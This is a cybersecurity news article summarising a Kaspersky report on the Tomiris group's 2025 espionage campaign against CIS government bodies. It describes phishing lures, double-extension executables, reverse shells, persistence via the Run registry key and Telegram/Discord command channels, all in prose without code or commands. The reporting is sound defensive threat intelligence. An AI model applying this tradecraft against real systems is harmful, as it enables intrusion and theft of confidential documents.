Tomiris APT Infiltrates Governments Via Phishing, Uses Telegram/Discord for C2 Espionage
The Tomiris group launched a new wave of cyber-espionage in early 2025, targeting high-level political and diplomatic institutions. According to Kaspersky Lab, the attacks focused on ministries of foreign affairs, state agencies, and intergovernmental organizations in Russia and across the CIS, with more than a thousand users potentially exposed to the group’s activity.
Initial access is obtained through highly targeted phishing emails carrying archive attachments. These archives are usually password-protected—the password is provided in the body of the email—and contain an executable file disguised as an office document. The attackers alter the icon, extend the filename, and apply a double extension such as “.doc .exe.” When viewed through a typical file manager, the true nature of the file is hidden, and the victim sees what appears to be an ordinary document. The lure themes correspond to governmental workflows, such as discussions on regional development projects in Russia or protocols of intergovernmental meetings.
More than half of the emails and lure files observed in the current campaign are written in Russian, indicating that Russian-speaking users and institutions remain the primary targets. The remaining messages are localized for Turkmenistan, Kyrgyzstan, Tajikistan, and Uzbekistan, where they appear in national languages. Filenames frequently imitate bureaucratic paperwork, such as “аппарат правительства российской федерации по вопросу…” or “план-протокол встречи о сотрудничестве представителей.”
Once the attachment is launched, first-stage implants begin to deploy. In most analyzed incidents, these are reverse shells that connect to a command server and grant operators a remote console. Tomiris develops these modules in several programming languages — including C and C++, C#, Go, Rust, and Python. Their capabilities are intentionally minimal: collecting basic system and network information, executing commands, and downloading the next-stage payload. They do not self-propagate nor embed themselves deeply until the operator manually establishes persistence via a second-stage tool.
The next phase involves installing post-exploitation frameworks such as AdaptixC2 and Havoc. To deploy them, attackers rely heavily on legitimate Windows utilities — bitsadmin, curl, PowerShell, and certutil. After verifying that the downloaded file is present and not neutralized by security software, the operator registers it for automatic execution via the Run registry key. With this, Tomiris gains stable, long-term access and can expand its toolkit on demand.
A separate section of Kaspersky Lab’s report highlights new implants. Rust Downloader, a previously undocumented module, gathers system details and scans disks for files with extensions such as .jpg, .jpeg, .png, .txt, .rtf, .pdf, .xlsx, and .docx. It then sends operators a list of file paths via Discord webhooks — transmitting only metadata, not file content. The downloader then periodically attempts to fetch a ZIP archive from a Tomiris server using a chain of VBS and PowerShell scripts, extract it into a temporary directory, and launch all executables inside. In observed cases, this archive contained components of the Havoc framework.
Several Tomiris tools are built around popular messaging platforms. The Python Discord ReverseShell uses the discord library and Discord’s public infrastructure as a command channel, receiving text commands and returning execution results. Through it, operators can load additional modules such as the Tomiris Python FileGrabber stealer — which collects documents and images and exfiltrates them as a ZIP archive — and the Tomiris Python Distopia Backdoor, based on the open-source dystopia-c2 project and equipped with standard remote-administration functions. A parallel set of tools leverages Telegram: Python and C# ReverseShell variants and a PowerShell backdoor use bot tokens and chat_id values to receive commands and exfiltrate data through the Telegram API.
Researchers note that in 2025 Tomiris increasingly depends on implants using Telegram and Discord as command-and-control layers. This approach masks malicious traffic as ordinary interactions with popular services, complicating network-level detection and analysis. At the same time, the group continues to rely on older tools such as JLORAT (known since 2022), which executes commands, collects files, captures screenshots, and exhibits Tomiris’s hallmark tactic of distributing multiple modules under similarly long filenames inside encrypted archives with repetitive passwords.
To move laterally and hide their tracks, Tomiris operators deploy reverse SOCKS proxies. The group’s arsenal includes ReverseSocks modules written in C++ and Go, almost entirely copied from open-source GitHub projects. These allow attackers to proxy vulnerability scanners and other tools through already compromised hosts, advancing the intrusion while remaining within the victim’s internal network.
Kaspersky Lab emphasizes that the 2025 Tomiris campaign strategically mixes modules written in diverse programming languages and relies on widely accessible cloud and messaging services to increase the resilience of its infrastructure and reduce the likelihood of detection. The operators’ core objective is to secure durable remote access to government systems and exfiltrate confidential documents. In several cases, analysts were able to reconstruct the entire attack sequence — from the moment a phishing lure was opened to the final deployment of AdaptixC2 and Havoc.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
